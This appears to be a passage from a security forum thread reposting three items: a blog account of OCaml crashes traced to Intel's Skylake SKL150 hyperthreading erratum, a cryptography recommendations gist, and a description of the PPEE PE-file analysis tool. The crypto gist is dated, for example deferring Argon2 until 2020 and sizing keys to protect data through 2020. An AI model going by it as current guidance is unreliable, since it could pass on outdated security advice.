Speaking from personal experience, those things happen and can result in a computer that boots and runs a GUI just fine, then crashes under load. So, I suggested that SIOU run a memory test, underclock their processor, and disable hyperthreading (HT) while they were at it. The HT suggestion was inspired by an earlier report of a Skylake bug involving AVX vector arithmetic, which would show up only with HT enabled (see description). SIOU didn't take my suggestions well, arguing (correctly) that they were running other CPU- and memory-intensive tests on their Skylake machines and only the ones written in OCaml would crash. Clearly, they thought their hardware was perfect and the bug was in my software. Great. I still managed to cajole them into running a memory test, which came back clean, but my suggestion about turning HT off was ignored. (Too bad, because this would have saved us much time.) In parallel, SIOU was conducting an impressive investigation, varying the version of OCaml, the C compiler used to compile OCaml's runtime system, and the operating system. The verdict came as follows:
- OCaml: 4.03, including early betas, but not 4.02.3.
- C compiler: GCC, but not Clang.
- OS: Linux and Windows, but not MacOS.
Since MacOS uses Clang and they used a GCC-based Windows port, the finger was firmly pointed at OCaml 4.03 and GCC. Surely, SIOU reasoned, in the OCaml 4.03 runtime system there is a piece of bad C code -- an undefined behavior, as we say in the business -- causing GCC to generate machine code that crashes, as C compilers are allowed to do in the presence of undefined behaviors. That would not be the first time that GCC treats undefined behaviors in the least helpful way possible; see for instance this security hole and this broken benchmark. The explanation above was plausible but still failed to account for the random nature of the crashes. When GCC generates bizarre code based on an undefined behavior, it still generates deterministic code. 
The only source of randomness I could think of is Address Space Layout Randomization (ASLR), an OS feature that causes absolute memory addresses to change from run to run. The OCaml runtime system uses absolute addresses in some places, e.g. to index into a hash table of memory pages. However, the crashes remained random after turning ASLR off, in particular when running under the GDB debugger. We were now in early May 2016, and it was my turn to get my hands dirty, as SIOU subtly hinted by giving me a shell account on their famous Skylake machine. My first attempt was to build a debug version of OCaml 4.03 (to which I planned to add even more debugging instrumentation later) and rebuild SIOU's application with this version of OCaml. Unfortunately this debug version would not trigger the crash. Instead, I worked from the executable provided by SIOU, first interactively under GDB (but it nearly drove me crazy, as I had to wait sometimes one hour to trigger the crash again), then using a little OCaml script that ran the program 1000 times and saved the core dumps produced at every crash. Debugging the OCaml runtime system is no fun, but post-mortem debugging from core dumps is atrocious. Analysis of 30 core dumps showed the segfaults to occur in 7 different places, two within the OCaml GC and 5 within the application. The most popular place, with 50% of the crashes, was the mark_slice function from OCaml's GC. In all cases, the OCaml heap was corrupted: a well-formed data structure contains a bad pointer, i.e. a pointer that doesn't point to the first field of a Caml block but instead points to the header or inside the middle of a Caml block, or even to invalid memory (already freed). The 15 crashes in mark_slice were all caused by a pointer two words ahead in a block of size 4. All those symptoms were consistent with familiar mistakes such as the ocamlopt compiler forgetting to register a memory root with the GC. 
However, those mistakes would cause reproducible crashes, depending only on the allocation and GC patterns. I completely failed to see what kind of memory management bug in OCaml could cause random crashes! For lack of a better idea, I then listened again to the voice at the back of my head that was whispering "hardware bug!". I had a vague impression that the crashes happened more frequently the more the machine was loaded, as would be the case if it were just an overheating issue. To test this theory, I modified my OCaml script to run N copies of SIOU's program in parallel. For some runs I also disabled the OCaml memory compactor, resulting in a bigger memory footprint and more GC activity. The results were not what I expected but striking nonetheless:

N    system load    w/default options   w/compactor turned off
1    3+epsilon      0 failures          0 failures
2    4+epsilon      1 failure           3 failures
4    6+epsilon      12 failures         19 failures
8    10+epsilon     17 failures         23 failures
16   18+epsilon     16 failures

The number of failures given above is for 1000 runs of the test program. Notice the jump between N = 2 and N = 4? And the plateau for higher values of N? To explain those numbers, I need to give more information about the test Skylake machine. It has 4 physical cores and 8 logical cores, since HT is enabled. Two of the cores were busy with two long-running tests (not mine) in the background, but otherwise the machine was not doing much, hence the system load was 2 + N + epsilon, where N is the number of tests I ran in parallel. When there are no more than 4 active processes at the same time, the OS scheduler spreads them evenly between the 4 physical cores of the machine, and tries hard not to schedule two processes on the two logical cores of the same physical core, because that would result in underutilization of the resources of the other physical cores. This is the case here for N = 1 and also, most of the time, for N = 2. 
When the number of active processes grows above 4, the OS starts taking advantage of HT by scheduling processes to the two logical cores of the same physical core. This is the case for N = 4 here. It's only when all 8 logical cores of the machine are busy that the OS performs traditional time-sharing between processes. This is the case for N = 8 and N = 16 in our experiment. It was now evident that the crashes happened only when hyperthreading kicked in, or more precisely when the OCaml program was running along another hyperthread (logical core) on the same physical core of the processor. I wrote SIOU back with a summary of my findings, imploring them to entertain my theory that it all has to do with hyperthreading. This time they listened and turned hyperthreading off on their machine. Then, the crashes were gone for good: two days of testing in a loop showed no issues whatsoever. Problem solved? Yes! Happy ending? Not yet. Neither I nor SIOU tried to report this issue to Intel or others: SIOU because they were satisfied with the workaround consisting in compiling OCaml with Clang, and because they did not want any publicity of the "SIOU's products crash randomly!" kind; I because I was tired of this problem, didn't know how to report those things (Intel doesn't have a public issue tracker like the rest of us), and suspected it was a problem with the specific machines at SIOU (e.g. a batch of flaky chips that got put in the wrong speed bin by accident). The second sighting The year 2016 went by without anyone else reporting that the sky (or more exactly the Skylake) was falling with OCaml 4.03, so I gladly forgot about this little episode at SIOU (and went on making horrible puns). Then, on January 6th 2017, Enguerrand Decorne and Joris Giovannangeli at Ahrefs (another Serious Industrial OCaml User, member of the Caml Consortium to boot) report mysterious random crashes with OCaml 4.03.0: this is PR#7452 on the Caml bug tracker. 
In the repro case they provided, it's the ocamlopt.opt compiler itself that sometimes crashes or produces nonsensical output while compiling a large source file. This is not particularly surprising, since ocamlopt.opt is itself an OCaml program compiled with the ocamlopt.byte compiler, but it made the issue easier to discuss and reproduce. The public comments on PR#7452 show rather well what happened next, and the Ahrefs people wrote a detailed story of their bug hunt as a blog post. So, I'll only highlight the turning points of the story. Twelve hours after opening the PR, and already 19 comments into the discussion, Enguerrand Decorne reports that "every machine on which we were able to reproduce the issue was running a CPU of the Intel Skylake family". The day after, I mention the 2016 random crash at SIOU and suggest disabling hyperthreading. The day after, Joris Giovannangeli confirms that the crash cannot be reproduced when hyperthreading is disabled. In parallel, Joris discovers that the crash happens only if the OCaml runtime system is built with gcc -O2, but not with gcc -O1. In retrospect, this explains the absence of crashes with the debug OCaml runtime and with OCaml 4.02, as both are built with gcc -O1 by default. I go out on a limb and post the following comment:

  "Is it crazy to imagine that gcc -O2 on the OCaml 4.03 runtime produces a specific instruction sequence that causes hardware issues in (some steppings of) Skylake processors with hyperthreading? Perhaps it is crazy. On the other hand, there was already one documented hardware issue with hyperthreading and Skylake (link)."

Mark Shinwell contacts some colleagues at Intel and manages to push a report through Intel customer support. Then, nothing happened for 5 months, until... 
* Likely fix nightmare-level Skylake erratum SKL150. Fortunately, either this erratum is very-low-hitting, or gcc/clang/icc/msvc won't usually issue the affected opcode pattern and it ends up being rare. SKL150 - Short loops using both the AH/BH/CH/DH registers and the corresponding wide register *may* result in unpredictable system behavior. Requires both logical processors of the same core (i.e. sibling hyperthreads) to be active to trigger, as well as a "complex set of micro-architectural conditions" SKL150 was documented by Intel in April 2017 and is described on page 65 of 6th Generation Intel® Processor Family - Specification Update. Similar errata go under the names SKW144, SKX150, SKZ7 for variants of the Skylake architecture, and KBL095, KBW095 for the newer Kaby Lake architecture. "Nightmare-level" is not part of the Intel description but sounds about right. Despite the rather vague description ("complex set of micro-architectural conditions", you don't say!), this erratum rings a bell: hyperthreading required? check! triggers pseudo-randomly? check! does not involve floating-point nor vector instructions? check! Plus, a microcode update that works around this erratum is available, nicely packaged by Debian, and ready to apply to our test machines. A few hours later, Joris Giovannangeli confirms that the crash is gone after upgrading the microcode. I run more tests on my shiny new Skylake-based workstation (courtesy of Inria's procurement) and come to the same conclusion, since a test that crashes in less than 10 minutes with the old microcode runs 2.5 days without problems with the updated microcode. Another reason to believe that SKL150 is the culprit is that the problematic code pattern outlined in this erratum is generated by GCC when compiling the OCaml run-time system. 
For example, in byterun/major_gc.c, function sweep_slice, we have C code like this:

  hd = Hd_hp (hp);
  /*...*/
  Hd_hp (hp) = Whitehd_hd (hd);

After macro-expansion, this becomes:

  hd = *hp;
  /*...*/
  *hp = hd & ~0x300;

Clang compiles this code the obvious way, using only full-width registers:

  movq (%rbx), %rax
  [...]
  andq $-769, %rax        # imm = 0xFFFFFFFFFFFFFCFF
  movq %rax, (%rbx)

However, gcc prefers to use the %ah 8-bit register to operate upon bits 8 to 15 of the full register %rax, leaving the other bits unchanged:

  movq (%rdi), %rax
  [...]
  andb $252, %ah
  movq %rax, (%rdi)

The two codes are functionally equivalent. One possible reason for GCC's choice of code is that it is more compact: the 8-bit constant $252 fits in 1 byte of code, while the 32-bit-extended-to-64-bit constant $-769 needs 4 bytes of code. At any rate, the code generated by GCC does use both %rax and %ah, and, depending on optimization level and bad luck, such code could end up in a loop small enough to trigger the SKL150 bug. So, in the end, it was a hardware bug. Told you so!

Epilogue

Intel released microcode updates for Skylake and Kaby Lake processors that fix or work around the issue. Debian has detailed instructions to check whether your Intel processor is affected and how to obtain and apply the microcode updates. The timing for the publication of the bug and the release of the microcode updates was just right, because several projects written in OCaml were starting to observe mysterious random crashes, for example Lwt, Coq, and Coccinelle. The hardware bug is making the rounds on technical Web sites, see for example Ars Technica, HotHardware, Tom's Hardware, and Hacker News.

Sursa: http://gallium.inria.fr/blog/intel-skylake-bug/
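The equivalence of the two compiler outputs above can be sanity-checked numerically (this sketch is not from the original post): `andq $-769, %rax` ANDs the full register with 0xFFFFFFFFFFFFFCFF (the two's-complement encoding of -769, i.e. ~0x300), while `andb $252, %ah` masks only bits 8-15 with 0xFC, clearing bits 8 and 9.

```python
# Model both instruction sequences on a 64-bit value and confirm
# they compute the same result: clearing bits 8 and 9 (& ~0x300).
MASK64 = (1 << 64) - 1

def clang_style(rax: int) -> int:
    # andq $-769, %rax  ->  AND with 0xFFFFFFFFFFFFFCFF
    return rax & (-769 & MASK64)

def gcc_style(rax: int) -> int:
    # andb $252, %ah    ->  mask bits 8..15 with 0xFC, rest untouched
    ah = (rax >> 8) & 0xFF
    ah &= 252
    return (rax & ~(0xFF << 8)) | (ah << 8)

for value in (0x0123456789ABCDEF, MASK64, 0x300, 0):
    assert clang_style(value) == gcc_style(value) == value & ~0x300 & MASK64
```

The sequences only differ in encoding size, exactly as the post argues, which is why GCC's peephole optimizer prefers the byte-register form.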
  22. Symmetric Encryption

The only way to encrypt today is authenticated encryption, or "AEAD". ChaCha20-Poly1305 is faster in software than AES-GCM; AES-GCM will be faster than ChaCha20-Poly1305 with AES-NI. Poly1305 is also easier than GCM for library designers to implement safely. AES-GCM is the industry standard.

Use, in order of preference:
- The NaCl/libsodium default
- ChaCha20-Poly1305
- AES-GCM

Avoid:
- AES-CBC
- AES-CTR by itself
- Block ciphers with 64-bit blocks, such as Blowfish
- OFB mode
- RC4, which is comically broken

Symmetric Key Length

See The Physics of Brute Force to understand why 256-bit keys are more than sufficient. But remember: your AES key is far less likely to be broken than your public key pair, so the latter key size should be larger if you're going to obsess about this.

Use:
- Minimum: 128-bit keys
- Maximum: 256-bit keys

Avoid:
- Constructions with huge keys
- Cipher "cascades"
- Key sizes under 128 bits

Symmetric Signatures

If you're authenticating but not encrypting, as with API requests, don't do anything complicated. There is a class of crypto implementation bugs that arises from how you feed data to your MAC, so, if you're designing a new system from scratch, Google "crypto canonicalization bugs". Also, use a secure compare function.

Use:
- HMAC

Avoid:
- HMAC-MD5
- HMAC-SHA1
- Custom "keyed hash" constructions
- Complex polynomial MACs
- Encrypted hashes
- Anything CRC

Hashing/HMAC Algorithm

If you can get away with it, you want to use hashing algorithms that truncate their output, which sidesteps length-extension attacks. Meanwhile: it's less likely that you'll upgrade from SHA-2 to SHA-3 than it is that you'll upgrade from SHA-2 to BLAKE2, which is faster than SHA-3, and SHA-2 looks great right now, so get comfortable and cuddly with SHA-2. 
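The "secure compare function" advice in the Symmetric Signatures section above can be illustrated with Python's standard library (a minimal sketch, not from the original gist; the key and request strings are made up, and plain HMAC-SHA-256 is used for stdlib portability even though the list below prefers HMAC-SHA-512/256):

```python
import hashlib
import hmac

# Illustrative server-side secret; in practice load it from a secret store.
KEY = b"an-illustrative-secret-key"

def sign(message: bytes) -> bytes:
    # HMAC tag over the raw request body.
    return hmac.new(KEY, message, hashlib.sha256).digest()

def verify(message: bytes, tag: bytes) -> bool:
    expected = hmac.new(KEY, message, hashlib.sha256).digest()
    # Constant-time comparison: a plain == short-circuits on the first
    # differing byte and leaks timing information to an attacker.
    return hmac.compare_digest(expected, tag)

tag = sign(b"GET /v1/items")
assert verify(b"GET /v1/items", tag)
assert not verify(b"GET /v1/items-tampered", tag)
```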
Use, in order of preference:
- HMAC-SHA-512/256
- HMAC-SHA-512/224
- HMAC-SHA-384
- HMAC-SHA-224
- HMAC-SHA-512
- HMAC-SHA-256

Alternately, use in order of preference:
- BLAKE2
- SHA3-512
- SHA3-256

Avoid:
- HMAC-SHA-1
- HMAC-MD5
- MD6
- EDON-R

Random IDs

When creating random IDs, numbers, URLs, nonces, initialization vectors, or anything else that is random, you should always use /dev/urandom.

Use:
- /dev/urandom

Create:
- 256-bit random numbers

Avoid:
- Userspace random number generators
- /dev/random

Password Hashing

When using scrypt for password hashing, be aware that it is very sensitive to the parameters, making it possible to end up weaker than bcrypt, and that it suffers from a time-memory trade-off (source #1 and source #2). When using bcrypt, make sure to use the following algorithm to prevent the leading NULL byte problem and the 72-character password limit: bcrypt(base64(sha-512(password)))

I'd wait a few years, until 2020 or so, before implementing any of the Password Hashing Competition candidates, such as Argon2. They just haven't had the time to mature yet.

Use, in order of preference:
- scrypt
- bcrypt
- sha512crypt
- sha256crypt
- PBKDF2

Avoid:
- Plaintext
- Naked SHA-2, SHA-1, MD5
- Complex homebrew algorithms
- Any encryption algorithm

Asymmetric Encryption

It's time to stop using vanilla RSA, and start using NaCl/libsodium. Of all the cryptographic "best practices", this is the one you're least likely to get right on your own. NaCl/libsodium has been designed to prevent you from making stupid mistakes, it's highly favored among the cryptographic community, and it focuses on modern, highly secure cryptographic primitives. It's time to start using ECC. Here are several reasons you should stop using RSA and switch to elliptic curve software:

- Progress in attacking RSA --- really, all the classic multiplicative group primitives, including DH and DSA and presumably ElGamal --- is proceeding faster than progress against elliptic curve. 
- RSA (and DH) drag you towards "backwards compatibility" (i.e., downgrade-attack compatibility) with insecure systems. Elliptic curve schemes generally don't need to be vigilant about accidentally accepting 768-bit parameters.
- RSA begs implementors to encrypt directly with its public key primitive, which is usually not what you want to do: not only does accidentally designing with RSA encryption usually forfeit forward secrecy, but it also exposes you to new classes of implementation bugs. Elliptic curve systems don't promote this particular foot-gun.
- The weight of correctness/safety in elliptic curve systems falls primarily on cryptographers, who must provide a set of curve parameters optimized for security at a particular performance level; once that happens, there aren't many knobs for implementors to turn that can subvert security. The opposite is true in RSA. Even if you use RSA-OAEP, there are additional parameters to supply and things you have to know to get right.

If you have to use RSA, do use RSA-OAEP. But don't use RSA. Use ECC.

Use:
- NaCl/libsodium

Avoid:
- RSA-PKCS1v15
- RSAES-OAEP
- RSASSA-PSS with MGF1+SHA256
- Really, anything RSA
- ElGamal
- OpenPGP, OpenSSL, BouncyCastle, etc.

Asymmetric Key Length

As with symmetric encryption, asymmetric encryption key length is a vital security parameter. Academic, private, and government organizations provide different recommendations, with mathematical formulas to approximate the minimum key size required for security. See BlueKrypt's Cryptographic Key Length Recommendation for other recommendations and dates. 
To protect data up through 2020, it is recommended to meet the minimum requirements for asymmetric key lengths:

Method            RSA    ECC   D-H Key   D-H Group
Lenstra/Verheul   1881   161   151       1881
Lenstra Updated   1387   163   163       1387
ECRYPT II         1776   192   192       1776
NIST              2048   224   224       2048
ANSSI             2048   200   200       2048
BSI               3072   256   256       3072

See also the NSA Fact Sheet Suite B Cryptography and RFC 3766 for additional recommendations and math algorithms for calculating strengths based on calendar year. Personally, I don't see any problem with using 2048-bit RSA/DH group and 256-bit ECC/DH key lengths. So, my recommendation would be:

Use:
- 256-bit minimum for ECC/DH keys
- 2048-bit minimum for RSA/DH group

Avoid:
- Not following the above recommendations.

Asymmetric Signatures

In the last few years there has been a major shift away from conventional DSA signatures and towards misuse-resistant "deterministic" signature schemes, of which EdDSA and RFC 6979 are the best examples. You can think of these schemes as "user-proofed" responses to the PlayStation 3 ECDSA flaw, in which reuse of a random number leaked secret keys. Use deterministic signatures in preference to any other signature scheme.

Use, in order of preference:
- NaCl/libsodium
- Ed25519
- RFC 6979 (deterministic DSA/ECDSA)

Avoid:
- RSA-PKCS1v15
- RSASSA-PSS with MGF1+SHA256
- Really, anything RSA
- Vanilla ECDSA
- Vanilla DSA

Diffie-Hellman

This is the trickiest one. Here is roughly the set of considerations:

- If you can just use NaCl, use NaCl. You don't even have to care what NaCl does.
- If you can use a very trustworthy library, use Curve25519; it's the modern ECDH curve with the best software support and the most analysis. People really beat the crap out of Curve25519 when they tried to get it standardized for TLS. There are stronger curves, but none supported as well as Curve25519. But don't implement Curve25519 yourself or port the C code for it. 
- If you can't use a very trustworthy library for ECDH but can for DH, use DH-2048 with a standard 2048-bit group, like Colin says, but only if you can hardcode the DH parameters. But don't use conventional DH if you need to negotiate parameters or interoperate with other implementations.
- If you have to do handshake negotiation or interoperate with older software, consider using NIST P-256, which has very widespread software support. Hardcoded-param DH-2048 is safer than NIST P-256, but NIST P-256 is safer than negotiated DH. But only if you have very trustworthy library support, because NIST P-256 has some pitfalls. P-256 is probably the safest of the NIST curves; don't go down to -224. Isn't crypto fun?
- If your threat model is criminals, prefer DH-1024 to sketchy curve libraries. If your threat model is governments, prefer sketchy curve libraries to DH-1024. But come on, find a way to one of the previous recommendations.

It sucks that DH (really, "key agreement") is such an important crypto building block, but it is.

Use, in order of preference:
- NaCl/libsodium
- 2048-bit Diffie-Hellman Group #14

Avoid:
- Conventional DH
- SRP
- J-PAKE
- Handshakes and negotiation
- Elaborate key negotiation schemes that only use block ciphers
- srand(time())

Website security

By "website security", we mean "the library you use to make your web server speak HTTPS". Believe it or not, OpenSSL is still probably the right decision here, if you can't just delegate this to Amazon and use HTTPS elastic load balancers, which makes this their problem, not yours.

Use:
- OpenSSL, LibreSSL, or BoringSSL if you run your own site
- Amazon AWS Elastic Load Balancing if Amazon does

Avoid:
- PolarSSL
- GnuTLS
- MatrixSSL

Client-server application security

What happens when you design your own custom RSA protocol is that 1-18 months afterwards, hopefully sooner but often later, you discover that you made a mistake and your protocol had virtually no security. A good example is Salt Stack. Salt managed to deploy e=1 RSA. 
It seems a little crazy to recommend TLS given its recent history:

- The Logjam DH negotiation attack
- The FREAK export cipher attack
- The POODLE CBC oracle attack
- The RC4 fiasco
- The CRIME compression attack
- The Lucky13 CBC padding oracle timing attack
- The BEAST CBC chained IV attack
- Heartbleed
- Renegotiation
- Triple Handshakes
- Compromised CAs

Here's why you should still use TLS for your custom transport problem:

- Many of these attacks only work against browsers, because they rely on the victim accepting and executing attacker-controlled Javascript in order to generate repeated known/chosen plaintexts.
- Most of these attacks can be mitigated by hardcoding TLS 1.2+, ECDHE and AES-GCM. That sounds tricky, and it is, but it's less tricky than designing your own transport protocol with ECDHE and AES-GCM!
- In a custom transport scenario, you don't need to depend on CAs: you can self-sign a certificate and ship it with your code, just like Colin suggests you do with RSA keys.

Use:
- TLS

Avoid:
- Designing your own encrypted transport, which is a genuinely hard engineering problem
- Using TLS but in a default configuration, like, with "curl"
- Using "curl"
- IPSEC

Online backups

Of course, you should host your own backups in house. The best security is the security where others just don't get access to your data. There are many tools to do this, all of which should be using OpenSSH or TLS for the transport. If using an online backup service, use Tarsnap. It's withstood the test of time.

Use:
- Tarsnap

Avoid:
- Google
- Apple
- Microsoft
- Dropbox
- Amazon S3

Sursa: https://gist.github.com/atoponce/07d8d4c833873be2f68c34f9afc5a78a
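The "hardcode TLS 1.2+" mitigation mentioned above can be expressed with Python's standard ssl module (a client-side sketch, not from the original gist; requires Python 3.7+ for the TLSVersion enum, and the pinned-certificate path is illustrative):

```python
import ssl

# Start from the hardened defaults, then refuse anything older than
# TLS 1.2, regardless of what the peer offers during negotiation.
ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2

# For a custom transport with a shipped self-signed certificate, pin it
# instead of trusting the system CA store (path is illustrative):
# ctx = ssl.create_default_context(cafile="pinned-cert.pem")
# ctx.minimum_version = ssl.TLSVersion.TLSv1_2

assert ctx.minimum_version == ssl.TLSVersion.TLSv1_2
```

Wrapping a socket with this context (`ctx.wrap_socket(sock, server_hostname=...)`) then enforces the version floor on every connection.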
  23. PPEE (puppy) is a professional PE file explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail. Puppy is free and tries to be small, fast, nimble and friendly, like your puppy.

Download v1.09 (Visual C++ 2010 Redistributable Package required)

Features

Puppy is robust against malformed and crafted PE files, which makes it handy for reversers, malware researchers and those who want to inspect PE files in more detail.

- All directories in a PE file are supported, including Export, Import, Resource, Exception, Certificate (relies on Windows API), Base Relocation, Debug, TLS, Load Config, Bound Import, IAT, Delay Import and CLR
- Both PE32 and PE64 support
- Examine YARA rules against the opened file
- VirusTotal and OPSWAT Metadefender query report
- Statically analyze Windows native and .NET executables
- Robust parsing of exe, dll, sys, scr, drv, cpl, ocx and more
- Edit almost every data structure
- Easily dump sections, resources and .NET assembly directories
- Entropy and MD5 calculation of the sections and resource items
- View strings embedded in files, including URL, registry and suspicious strings
- Detect common resource types
- Extract artifacts remaining in the PE file
- Anomaly detection
- Right-click for Copy, Search in web, Whois and dump
- Built-in hex editor
- Explorer context menu integration
- Descriptive information for data members
- Refresh, Save and Save as menu commands
- Drag and drop support
- List view columns can sort data in an appropriate way
- Open file from command line
- Checksum validation
- Plugin enabled

Link: https://www.mzrst.com/
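The per-section entropy that tools like PPEE report is ordinary Shannon entropy over byte frequencies: packed or encrypted sections score close to 8 bits/byte, while plain code or text scores much lower. A minimal sketch of the calculation (not PPEE's actual code):

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    # H = -sum(p * log2(p)) over the observed byte frequencies.
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

# A constant-filled section has zero entropy; uniformly distributed
# bytes (as in good ciphertext) approach the 8 bits/byte maximum.
assert shannon_entropy(b"\x00" * 1024) == 0.0
assert abs(shannon_entropy(bytes(range(256)) * 4) - 8.0) < 1e-9
```

Running this over each PE section's raw data is enough to flag likely packed sections (a common rule of thumb is entropy above ~7 bits/byte).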
  24. Sounds really shady. Ban.